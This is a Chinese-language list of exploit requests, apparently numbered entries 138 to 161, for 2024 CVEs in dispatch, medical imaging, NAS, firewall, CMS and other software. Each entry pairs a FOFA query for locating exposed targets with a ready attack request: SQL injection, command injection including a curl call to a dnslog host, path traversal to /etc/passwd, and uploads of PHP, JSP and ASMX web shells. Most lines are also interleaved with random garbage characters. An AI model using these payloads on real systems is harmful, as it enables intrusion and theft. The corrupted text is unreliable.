( ^# a( \/ t  [7 Q7 T6 oGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
2 F: r! d8 ?, c( R! p2 `+ d. qHost: x.x.x.x
: m2 A! e9 y# |' k, ?  [/ h  V! ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.05 X+ I$ ~3 G0 i# x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# E1 a1 n7 `: w* O3 B- IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- s4 ?% n, o0 f
Accept-Encoding: gzip, deflate, br
. K& ?9 g! w) T: |' f4 ?& D  tConnection: close, [7 h0 k1 r: L, l' e$ h0 ~3 M
Upgrade-Insecure-Requests: 1' K$ O3 `' j$ q

& D+ g1 F, P9 T4 v; g8 P. F
  E$ R: H8 N1 n) l139. 福建科立讯通信指挥调度平台editemedia.php sql注入
& U8 P' h& P! _5 ECVE-2024-2622
+ x1 c4 @- ^5 w4 F+ H: j5 PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 Y9 M- x9 |: N# X( J/ v
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1: ?; C8 k5 F+ G9 Q: e; D+ B; G' D
Host: x.x.x.x
) p1 ^2 O  @& j6 T. S( e* GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 {8 L" a4 w, Q  ~9 p4 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! d1 B: T- r2 }: O( m% c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 @  L2 L* f. h+ s7 Y) L8 l2 z) XAccept-Encoding: gzip, deflate, br
1 ]) Y' u) W3 O" a  {Connection: close- v5 p. k2 a& x. x3 U' N3 f# R1 N
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk3 s; {+ o4 G/ y8 J" U! f
Upgrade-Insecure-Requests: 1
; i  S% {" {: P  _* I
( B8 I0 O% D7 E9 v) ?
+ ~$ f0 `) N! [7 x0 I140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入' z2 }9 e: e$ {, U6 r
CVE-2024-2566
" }( L. d$ A) |- d9 _0 YFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
$ Z% I+ C6 ^) C$ N, }: \7 LGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
; P( `- ~; I5 c) e1 K# p, E" b7 pHost: x.x.x.x
% t4 `% \0 j0 ^) u' p: MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
$ ~; f, T8 x  ^. t  [. k" `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 y, V# J: a/ R" Y* q9 M  D, W' N/ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ J* ]2 @! k/ D$ O' A% e! Z; rAccept-Encoding: gzip, deflate, br
+ x! D6 z! o) z! E1 y5 Z, U* f- PConnection: close
, M. B1 E2 L# n, _9 y* H7 |2 kCookie: authcode=h8g9
1 p1 k4 K4 d2 d/ NUpgrade-Insecure-Requests: 14 E+ k) P% Z$ W8 e1 L# m7 q0 g' e! W

; o. [0 J. R2 r. h/ t% y8 }3 _0 Q1 `8 }/ O' e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
1 n+ _) s, _1 u# K9 \( NFOFA:body="指挥调度管理平台"7 D6 g- }! |3 o- K0 r
POST /app/ext/ajax_users.php HTTP/1.1
, }% k  _# V) GHost: your-ip
  b* I7 \& P+ cUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info) P0 j( z2 |7 W. p
Content-Type: application/x-www-form-urlencoded
2 j- w6 {. V5 j: d8 Q4 z' K  j- a  P- f6 O  t, I1 f7 Z# y) A8 I! D

8 ^8 U( _# v) `/ \" ?dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -" {9 A' x/ Q# ]# {4 W

) z  c; f+ ]2 ^! l) R, n1 n0 g4 ], ]
142. CMSV6车辆监控平台系统中存在弱密码+ E3 R  u) u6 D9 {
CVE-2024-29666: D. @! w1 T3 p- i
FOFA:body="/808gps/"
: B( D" J2 r9 ?! |2 H* ^) g) ]5 _admin/admin
4 x# ?6 |5 `& t+ G- E- R& ~143. Netis WF2780 v2.1.40144 远程命令执行/ {: Z# J7 J' p, M; G
CVE-2024-258509 Q% ]$ ~" r) v( J; v, G2 w
FOFA:title='AP setup' && header='netis'% s/ V/ c9 Z# Q! R) o
PAYLOAD7 d# q- x+ Q' g

1 s$ ^* s3 q! R* k" f5 T' H- L144. D-Link nas_sharing.cgi 命令注入0 Q4 U; U/ B2 h3 Q, b
FOFA:app="D_Link-DNS-ShareCenter"
# g- K" G" G2 f' N" v: g( esystem参数用于传要执行的命令1 t$ I+ n- a8 s5 d  T
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
; z; W! |4 z2 l9 WHost: x.x.x.x' {4 E6 W' y# z/ C9 ^; X; ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
3 a' }7 o4 o( p+ L$ JConnection: close8 V8 o: H  Q% G8 d
Accept: */*
/ n7 c9 y& Q% B) b& w: i: {! EAccept-Language: en0 U/ l) j2 \8 s- p. G: l
Accept-Encoding: gzip
$ [+ ~( E( f0 e0 |) l3 s; a2 D+ M. K0 b9 G$ U1 I7 }: `

* w; s3 d6 y8 E3 ]' @/ W- C8 [1 y145. Palo Alto Networks PAN-OS GlobalProtect 命令注入9 ]" K: `' ~8 }
CVE-2024-3400
% ?, Q" A( T8 `+ i% p5 H) yFOFA:icon_hash="-631559155"
7 a; C* \6 Z7 d! {( PGET /global-protect/login.esp HTTP/1.1
7 I  S2 P7 d$ B( c( ~Host: 192.168.30.112:1005
+ s5 e0 g; P7 X3 `: RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
  @* B2 `. ~8 n6 Y5 MConnection: close! q8 W' f2 N) H7 O. L' J
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
2 w  y& E# N1 fAccept-Encoding: gzip
0 E% h& L+ I- l: ~8 Q: e( q1 I" |/ ^; x/ p9 k

1 [' y4 K5 k# m+ n- e4 l146. MajorDoMo thumb.php 未授权远程代码执行3 P  N; I2 I! A8 A
CNVD-2024-02175
7 {$ b+ ?& [! a( c; Y* n' _FOFA:app="MajordomoSL"
/ l) _: b, M; [GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
( P3 ]: j2 ?, P/ ^/ Y; z+ f0 NHost: x.x.x.x: r! R5 n% t6 |0 r8 L1 b/ T4 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
( n9 g: {! \1 ]. l$ Z8 ^% [Accept-Charset: utf-8
: S0 u8 J) N8 b* ?2 Y8 F& }Accept-Encoding: gzip, deflate* |8 ?6 q# l6 x- L* ^! A! e! Q1 _
Connection: close# _9 B4 o+ }. H* m& T# k+ G

; S3 X' R) [, g# X$ e9 D8 k. _6 f" {$ Y
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* j- q8 i7 v% x) @! V; u) q
CVE-2024-32399
  J" q- l; \2 g; _FOFA:body="RaidenMAILD"
1 C$ E2 j# B* l- M% GGET /webeditor/../../../windows/win.ini HTTP/1.14 l+ F+ T; S+ x* }. e- a
Host: 127.0.0.1:812 O3 L& w  k: M) C0 z2 n
Cache-Control: max-age=0
$ r7 l# y, ^2 G) {. q" AConnection: close
/ p" {' A/ ~+ S
* L# p0 I0 I* y: S" s
+ N( u- b9 m' B148. CrushFTP 认证绕过模板注入
6 u+ `5 C$ i" v& P+ cCVE-2024-4040
. a  ?, V9 ^. {1 b: `- Y# \! [FOFA:body="CrushFTP"
* U3 y* y' u% v( \/ B9 V- d6 cPAYLOAD+ g" l- E+ d1 {0 U. e' }
3 }# R' g3 s. `5 O; x8 G$ c
149. AJ-Report开源数据大屏存在远程命令执行2 L' q! b9 n0 w! Y0 W
FOFA:title="AJ-Report"
( k8 T* k. c3 a( O
) |" u6 R# T0 q  j1 ]& z1 mPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
: L! b) {3 S& W. PHost: x.x.x.x' ~: w* L! H$ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: I/ V5 F: V8 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! \3 @; _4 H) O# I; mAccept-Encoding: gzip, deflate, br2 g$ e" o7 ^; {+ j4 s+ ~
Accept-Language: zh-CN,zh;q=0.9
7 k( N: |7 Q$ Y! f0 e0 LContent-Type: application/json;charset=UTF-89 [) ^. f  q3 Y% S
Connection: close
" e% `- x. x* c/ @! }& H' P" x7 @$ ^1 |) ?# b
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}$ @7 n- k3 H; d5 w

1 a! H5 ?. ~' h& [! ]4 l  _150. AJ-Report 1.4.0 认证绕过与远程代码执行
' F5 }& L/ k9 y" gFOFA:title="AJ-Report"
# g- @2 U$ V/ B( W7 xPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1! A+ Y6 a! r) i6 F
Host: x.x.x.x0 e: I& y4 b+ M) n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; I/ P1 H6 U+ t7 o3 E- zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# r, T# [: y4 {0 Q! a+ _: y: ?
Accept-Encoding: gzip, deflate, br5 Q" `. k2 d, r' o; ^
Accept-Language: zh-CN,zh;q=0.9& D, m+ M; y! h! u
Content-Type: application/json;charset=UTF-8
8 ?1 I. d. a  ?& p( G  EConnection: close
5 i* Z, t8 r/ H; g2 iContent-Length: 339
, T# J; P+ g1 g1 J; {4 q/ K5 o8 E' S" E
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
2 l" e+ K2 z1 Z7 v+ k/ q( ]* s8 y# p9 f/ ^

& ?  J' r$ R' r( Q9 @151. AJ-Report 1.4.1 pageList sql注入* Y- N  S% G3 C3 R2 r8 ^
FOFA:title="AJ-Report"
. p9 f8 p4 L) eGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1& l: k+ D7 x: ^8 V5 ]% ]7 z0 ?
Host: x.x.x.x
1 O8 j. d7 G+ n2 N* hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 l/ T& t; _2 V# s8 j4 Q+ dConnection: close  P, h- F: y; P6 }6 @! T
Accept-Encoding: gzip
6 t; _1 s- X" j7 a! O8 v6 |( z6 T4 {' B* M7 F0 j9 D
- L$ N6 ]0 V) d. u5 S
152. Progress Kemp LoadMaster 远程命令执行
  Z6 s* Q3 ?& R5 ~2 @9 OCVE-2024-1212
  `3 N* c/ h7 r1 C5 O4 OLoadMaster <= 7.2.59.2 (GA)
& u: r% E( J0 @/ b4 R# E8 \, [# W; w' l4 SLoadMaster<=7.2.54.8 (LTSF)5 i- o! W# S& S7 Y% m! v. f- j
LoadMaster <= 7.2.48.10 (LTS)
2 N2 ^3 K# X1 AFOFA:body="LoadMaster". b! M% G  e/ D, o3 n$ J+ E
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
! V2 e6 f" S+ {# hGET /access/set?param=enableapi&value=1 HTTP/1.1. x4 u! a( |4 p9 s9 x3 q
Host: x.x.x.x5 R' w/ R: Q# X5 f0 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1- p# O. V  b0 J# e& X& |" ^$ ~/ N
Connection: close
- u9 U* c9 y1 y! b" m& D2 ~/ PAccept: */*4 U& |7 {" [9 |; l' X
Accept-Language: en
7 `1 C/ f' W9 K+ p1 q' zAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
0 y5 f" g% @7 m0 e# B4 KAccept-Encoding: gzip+ f' n5 s& v% j+ e1 n

+ a% p( Z* P% B5 c/ o
- M" T3 M6 o% h1 T; v153. gradio任意文件读取! m! u( K- o( [; h3 M& B/ B" Z1 d
CVE-2024-1561FOFA:body="__gradio_mode__"
; E$ a6 @2 ^: v! o: _+ M% V第一步,请求/config文件获取componets的id
/ h( L9 V" [) o8 }1 Qhttp://x.x.x.x/config; _' ?+ u" p/ ]6 G

3 _5 |" w+ ~! R! P& \8 e: b/ r' b" l! L- W4 Y3 J1 D+ c
第二步,将/etc/passwd的内容写入到一个临时文件
# ^' C, C7 E/ l4 [6 S  yPOST /component_server HTTP/1.1
/ h* I: @9 T( OHost: x.x.x.x
! C4 m" d/ n' X3 W+ a* oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
' k# R6 G% Q. a5 k" I+ iConnection: close
8 p5 X2 G* X. j' o" |- U3 T* sContent-Length: 115; o6 D5 [8 |/ ]9 @, A4 J* G
Content-Type: application/json
5 T1 i$ _3 n1 t; _; ~% n4 Y% o- ZAccept-Encoding: gzip' ?+ Y" @$ d1 l1 H# ]
- k+ |1 G; d0 I3 J, m$ x. y
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
. U$ W3 ~8 e6 ^5 h" E# Z: U# ?- g; W+ s  v$ e
" |% P, ~( a2 ^, I7 X
第三步访问
! ]. z) U9 y9 Ihttp://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
9 f" z/ H2 y: @. E, K3 s3 h  n0 c4 Y" p5 I
5 V; ^, q+ ~! i1 z0 H
154. 天维尔消防救援作战调度平台 SQL注入
( @! Z# N) |% @1 b% \5 p1 x+ E0 T9 pCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
! S$ K6 v3 o9 A+ VPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
# L6 X) }  O  |Host: x.x.x.x
' q( j) T8 L1 `0 JContent-Length: 1061 d* b" e& G8 [# M6 W7 |# ]/ A
Cache-Control: max-age=0
; \$ l* e: H& n+ h6 F1 X( rUpgrade-Insecure-Requests: 16 N: B7 H" f) g8 p- H
Origin: http://x.x.x.x- R% @4 m6 ]; I9 V
Content-Type: application/json
9 w" ]  o2 X8 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36; ~- G$ ~+ x8 D! ]! F. J- [4 D- [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) f$ h* }5 [( U8 l, p5 g4 m7 WReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
  d7 e6 n/ D: a$ {9 f4 l6 lAccept-Encoding: gzip, deflate
! _) f- F: y  n" ZAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
8 |8 W6 u% w) [" c4 lConnection: close  y8 n3 u5 V3 b

& X8 ^$ ~/ h9 e- b, o9 g) z{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
" G; ]% p9 e' ]" V1 T1 e3 K" ^% T0 D

$ Q* I% t+ l; J155. 六零导航页 file.php 任意文件上传
" O2 _% D- l2 y4 G% i- d* YCVE-2024-34982
% l* i: n/ [2 U0 r# ?# vFOFA:title=="上网导航 - LyLme Spage"
+ L8 o7 g$ Y  |& w3 {' vPOST /include/file.php HTTP/1.1
1 V% [2 e, z6 U2 H% d. \) GHost: x.x.x.x
2 h/ O3 M2 d# R" s' p/ K; KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, d+ a8 c6 `& ~: c4 n1 n4 CConnection: close
' t8 K" y0 Z0 t& p$ r' e; A# ~: qContent-Length: 232
( _& J' @+ K0 l  oAccept: application/json, text/javascript, */*; q=0.012 E& s1 O! p2 s' e
Accept-Encoding: gzip, deflate, br* N2 G( \3 F6 L0 \, c9 z; o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ [9 L9 C9 ^- t( w  z- g
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f4 Q0 y& L/ n7 U4 q9 [; a
X-Requested-With: XMLHttpRequest0 l  g0 o& J$ ^- Y4 G# a2 z

* X' Z. c) k8 @& i9 T8 \-----------------------------qttl7vemrsold314zg0f8 ~. J. z4 r* p, c1 Y
Content-Disposition: form-data; name="file"; filename="test.php"
) V6 q, [' M" R! d& n8 G8 _/ FContent-Type: image/png
5 e: y" S1 N0 G* c: S) u& c7 C: U' h( b# T7 r' N+ ]
<?php phpinfo();unlink(__FILE__);?>: \, Q) f4 [- N+ ~: n9 E2 D
-----------------------------qttl7vemrsold314zg0f--
+ X7 @$ Y6 |, n' {6 Y6 _
+ H' s2 t0 h  ^- J- Q  s4 ~. c7 V+ o1 O7 w1 x  C
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
+ s0 z) }/ x$ R* B& D2 ]
* w& A: O! V& p" k156. TBK DVR-4104/DVR-4216 操作系统命令注入
4 R: @) o# G0 E+ F- pCVE-2024-3721) ?/ ?& _, R: S( d
FOFA:"Location: /login.rsp"" V5 n, g/ U( H1 w; p3 ?5 |
·TBK DVR-4104
( z  N! x5 U. O·TBK DVR-4216
3 h1 E5 \- O" ~" D* G! l. p0 W' [curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
# e. D$ R2 A# R3 B% o% J5 T
( O' K( e2 ^% i: h0 y8 e3 b1 I' N; W
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- w, V4 C& N" K) G* c
Host: x.x.x.x
8 E4 E: x; ~. y& @' \8 mUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 q( G# K7 K4 WConnection: close  O8 u* g1 {* Y  q2 z
Content-Length: 0
- K5 O& V4 n8 }5 ~) I- rCookie: uid=1
# ]3 \( F+ Z+ U  D2 s: MAccept-Encoding: gzip
2 I$ M' j# Q5 _/ |9 e3 q
% S% J/ j1 E& L% r4 M# R! `
1 c+ H, P, r& ^4 N* M8 F157. 美特CRM upload.jsp 任意文件上传/ s, ~4 F. {1 z5 o6 ?, o% A' }
CNVD-2023-069715 Q/ [. N( x; k$ ~; C' S" {/ ?( W
FOFA:body="/common/scripts/basic.js"1 D" I. {$ a- j3 O* g0 C/ J
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
& ?- j# ?' f1 J2 t% kHost: x.x.x.x9 C) F/ l4 e( [& [1 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.361 P" E3 ?4 D. l+ ^) t. F6 h
Content-Length: 7092 r" G( o+ N) M- ~* a, b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 u( h: e7 j3 ]/ ~. \+ F6 R; WAccept-Encoding: gzip, deflate
7 `' i+ m6 W$ y  yAccept-Language: zh-CN,zh;q=0.90 ^3 H) l+ E3 f9 e0 U
Cache-Control: max-age=0& c6 p7 G, G" l
Connection: close8 i( t) i  A  c. ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN. Q- K- c5 K! c6 {' `
Upgrade-Insecure-Requests: 1
1 E3 m6 ]8 _7 K7 e+ {5 @/ Z
! d' X  n: T4 \  b  y5 U------WebKitFormBoundary1imovELzPsfzp5dN- O/ _* q3 U( u+ n& i, E7 s
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
+ p4 o& K: ?' m* f4 y" yContent-Type: application/octet-stream
0 i' d& K7 J8 K% J7 c' r; d! t
5 f( x& Y4 R+ ~# A! Q  m  e5 ]nyhelxrutzwhrsvsrafb
. N1 k1 ^/ q3 U$ ^3 a# K4 f------WebKitFormBoundary1imovELzPsfzp5dN; Y6 r& x& q: u% }
Content-Disposition: form-data; name="key"
0 ~1 A& p& F; q" m* H
* t# N  x4 a/ i- T, fnull, L) e( k% r& W% b: ]7 N
------WebKitFormBoundary1imovELzPsfzp5dN
4 q& [9 h1 T9 V% k. oContent-Disposition: form-data; name="form"
% p' f3 x! j6 p9 x; g. z; y% b0 ~' y
null8 O# S4 U0 q. X
------WebKitFormBoundary1imovELzPsfzp5dN
8 ~/ g5 m6 J3 f. ]  g1 [Content-Disposition: form-data; name="field"
# k/ y  O' K0 c5 ]' E/ ^# F5 M9 q/ A& J
null6 }2 k5 C$ q. o2 ^( B, t- i
------WebKitFormBoundary1imovELzPsfzp5dN
9 N5 V# S7 L, R3 [8 |) {0 V& bContent-Disposition: form-data; name="filetitile"
$ }2 J# S7 n8 J0 {! }4 ~  N+ {
5 ^% v& ]/ J( E2 A) X1 Snull
9 Z8 T% \2 R* H( K% m------WebKitFormBoundary1imovELzPsfzp5dN
; x0 Z0 Q% C3 [+ d% K9 v0 [+ @Content-Disposition: form-data; name="filefolder"$ J0 P8 s- T+ f8 e; R

: \& o7 ~3 C6 M) E* G9 ~, Qnull
$ x& a. g  p: S+ i* I8 @& Y  a- p------WebKitFormBoundary1imovELzPsfzp5dN--
- j) x/ f% |6 e  p; ]: D1 Y3 D) u6 e( O2 A! h1 B

% \7 A: ~+ W7 j) F7 m7 z) Lhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp* i4 V; `9 u0 U6 |

. |- ?% k. C  F. _9 x; P158. Mura-CMS-processAsyncObject存在SQL注入
! ^- ^5 K$ m1 m, ]CVE-2024-32640
, z. J- h0 K0 I/ ?; d. uFOFA:"Generator: Masa CMS"' K2 q" V+ b  u% n6 P* }
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1# F5 T, h+ ^5 q$ W" S2 w' F; w
Host: {{Hostname}}. v: Z! F& e2 h! T* X! y
Content-Type: application/x-www-form-urlencoded
! q; R  L7 |* f% \* F& n) h8 |. D7 _9 Z
object=displayregion&contenthistid=x\'&previewid=18 |  U* a+ w+ `, D

4 r" S- z5 g* B4 M; ^6 ^8 R7 P' r
- k) Z1 H" Q7 ?+ v159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
7 I7 U% ?4 ~) D( A/ ^; jFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
5 o, @! \% _4 O& c9 t; \8 E9 |POST /webservices/WebJobUpload.asmx HTTP/1.1. @. v" C  `9 b) g1 M
Host: x.x.x.x
# D: E) ^  `' d7 ]/ GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36: @& k& y6 `8 e# H/ e
Content-Length: 1080
/ s. ~/ Y/ Q. \. H8 I& t: sAccept-Encoding: gzip, deflate
9 J' n$ L1 A8 ~% w" ~% PConnection: close
/ y: s' A& y. A" y7 t3 }Content-Type: text/xml; charset=utf-8/ U/ K! j; K+ ^# ]
Soapaction: "http://rainier/jobUpload"
( J9 C) C/ I/ }/ h7 }1 e4 {
5 l9 O* Y: h7 L<?xml version="1.0" encoding="utf-8"?>
( M1 W  w& x3 i  g9 v<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">% V+ k3 o" r9 Z+ u# K
<soap:Body>
% t: G$ x6 N: C* V4 |, z<jobUpload xmlns="http://rainier">& [5 w" \9 `) A+ Z3 {# f# A
<vcode>1</vcode>
9 n, w3 n! l3 o3 y, _<subFolder></subFolder>
6 Q4 ]: a& n$ K; A/ x6 m1 p# J<fileName>abcrce.asmx</fileName>+ q" b$ T/ A. [7 W
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>0 y" C. x- M7 r/ W: I
</jobUpload>2 l) B, `3 O  ~! A' `" J/ G
</soap:Body>- A4 A( V: }, Z* N8 L/ N( m
</soap:Envelope>
1 @$ A! X2 N0 p+ ?/ @6 N
( `6 u; f3 }( L, ^) T  n. j3 U! n+ B9 h
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
/ q  t+ {; p5 M# n+ c1 k3 D' y) P' b3 r  Q* H
! y9 G% r; }' V) B8 J6 b
160. Sonatype Nexus Repository 3目录遍历与文件读取, Z. W* C& c; t5 Q
CVE-2024-4956  \4 w: `) }, j" N
FOFA:title="Nexus Repository Manager"
" I' p( T% j6 [, d& g' _GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
( n4 Y; a6 I0 z9 F; dHost: x.x.x.x/ c- n2 n0 i* u
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0/ x& ~) T( c. k$ S/ Y
Connection: close
9 s7 P: J( f8 F7 HAccept: */*3 ~5 m! }% M1 T7 m
Accept-Language: en
  O) d3 m( k$ J$ [/ j' KAccept-Encoding: gzip3 A9 M6 _; z6 T

+ o* o3 G2 |" Z0 H- X) H! J( [
1 B( ~+ t2 L, i+ e. G- \/ j! B161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
